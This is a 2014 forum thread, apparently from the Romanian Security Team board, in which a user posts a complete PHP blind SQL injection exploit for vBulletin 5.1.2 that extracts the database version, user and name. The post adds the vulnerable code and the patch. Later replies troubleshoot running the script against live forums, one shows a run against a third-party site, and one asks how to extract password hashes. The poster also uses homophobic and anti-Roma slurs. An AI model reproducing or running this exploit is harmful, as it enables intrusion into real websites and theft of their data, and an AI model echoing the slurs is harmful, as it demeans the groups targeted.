[RST] vBulletin 5.1.2 SQL Injection Exploit

[Nytro]

Some idiots are trying to sell it:

http://1337day.com/exploits/22452

For 2000 $. Gay

Here it is. Free.

[phpcode]<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
$ch = curl_init($url);


curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output = curl_exec($ch);

if($output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];

$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabse: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>[/phpcode]

More details:

The query was the following:

SELECT
                    user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options,
                    user.posts, user.joindate, user.usertitle,user.reputation,
                    session.lastactivity AS lastvisit,
                    IF(displaygroupid=0, user.usergroupid,  displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid
                FROM user AS user
                LEFT JOIN session AS session ON session.userid = user.userid
                WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%"
                GROUP BY user.userid
                ORDER BY user.username ASC
                LIMIT 0, 10;

The "D" is the controlled parameter. And, the quote (") was NOT escaped.

The query was generated with a function from querydefs.php:

public function fetchMemberList($params, $db, $check_only = false)

The vulnerable code:

            if (!empty($params['startswith']))

{

if ($params['startswith'] == '#')

{

$where[] = 'user.username REGEXP "^[^a-z].?"';

}

else

{

$where[] = 'user.username LIKE "' . $params['startswith'] . '%"';

}

}

And the patch contains the fix:

            if (!empty($params['startswith']))

{

if ($params['startswith'] == '#')

{

$where[] = 'user.username REGEXP "^[^a-z].?"';

}

else

{

$where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"';

}

}

So now, the value is escaped and SQL Injection is fixed.

vBulletin team moved really fast in fixing this problem.

More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst

Edited July 20, 2014 by Nytro

[Byte-ul]

haha, pana si filmuletul este tot al tau )

good job

Trimite-le mail celor de la 1337day si spune-le sa il scoata.

[Nytro]

Nop, sa se faca de ras.

Dupa cum se vede, e BANAL exploit-ul. Si nu e util, sunt prea putine forumuri cu vBulletin 5.

O sa aduc mai multe detalii cand ajung la Bucuresti.

[.Breacker]

Aia de la 1337day nu au ce manca ? @Nytro , acum o sa vezi numai showoff-uri de calitate ,multi au forumuri de gaming care au ca platforma vBulletin.

[io.kent]

Ador noutatea asta Nytro de la mine pe tine o halba uriasa de bere

[cybermist]

Php Falat error: Call to undefined function curl_init() in root/phpfilename.php Help!!

[Dragos]

Php Falat error: Call to undefined function curl_init() in root/phpfilename.php Help!!

How to enable cURL in PHP / XAMPP - Stack Overflow

[pr0fw3b]

Acuma "hackerii" asteapta cat mai multi cu vBulletin 5.1.2 . Dar faza e ca multi cumpara cu o varianta mai in urma si asteapta degeaba uni ca nu prea o sa exploateze nimic .

[kumudam]

eroare

Notice: Undefined offset: 1 in /root/script.php on line 90

PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91

[SirGod]

eroare

Notice: Undefined offset: 1 in /root/script.php on line 90

PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91

Trebuie sa il rulezi din consola.

php script.php http://site.com/forum

[cybermist]

Notice: Undefined offset: 1 in /root/vbexploit.php on line 179

PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181

help

[.Breacker]

Notice: Undefined offset: 1 in /root/vbexploit.php on line 179

PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181

help

A postat si SirGod mai sus.

 php exploitname.php http://www.yourwebsite.com/forum

[cybermist]

A postat si SirGod mai sus.

 php exploitname.php http://www.yourwebsite.com/forum

done samething but still error

[kumudam]

aceasi eroare la liniile 90 si 91 -oare ce o fi?

merci de orice ajutor

[askwrite]

Trebuie sa-l rulati din consola, ce nu intelegeti?

[kumudam]

din consola il rulez ... in consola imi apare eroare, in loc de rezultat - ce nu intelegi???

[SirGod]

Nu mai incercati pe alte versiuni de vBulletin si o sa mearga. Scriptul cauta dupa un text anume, text ce nu se regaseste pe toate versiunile.

while(strpos($result, 'No Users Matched Your Query') == false)

[Gorkha]

Showing error

Notice: Uninitialized string offset: 0 in C:\xampp\htdocs\test\vb.php on line 91

after Uncomment ;extension=php_curl.dll

in php.ini

[nacks]

Am incercat si eu pe 5.1.2, dar primesc o eroare:

Notice: Undefined variable: username in /root/nytro.php on line 90
PHP Notice:  Undefined variable: username in /root/nytro.php on line 91

L.E: cred ca tine de link'ul in care se face "injectia" ...

Edited July 20, 2014 by nacks

[kempactick]

Te pomenesti ca il cumpara cineva cu 2000$, el fiind deja publicat de Nytro.

))

[Nytro]

Nota: danyweb a reusit sa il descopere inaintea tiganilor de la 1337gay. Si nu l-a facut public, nu a incercat sa il vanda...

Edit: Am adaugat detalii.

Edited July 20, 2014 by Nytro

[jdsmith321]

this is cool man, you got my respect

[wor1]

Is there any protection on the password columns?

select salt from user where userid='1' (works)

select password from user where userid='1' (not works)

Thanks for the exploit nice found

[mr.expdb]

good job ,Bro!

Thank you!

[k3nt_black]

root@bt:~/Desktop# php vbnew.php http://forum.vullsite.com/

Romanian Security Team - vBulltin 5.1.2 SQL Injection

Version: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

how fix mr Nytro ?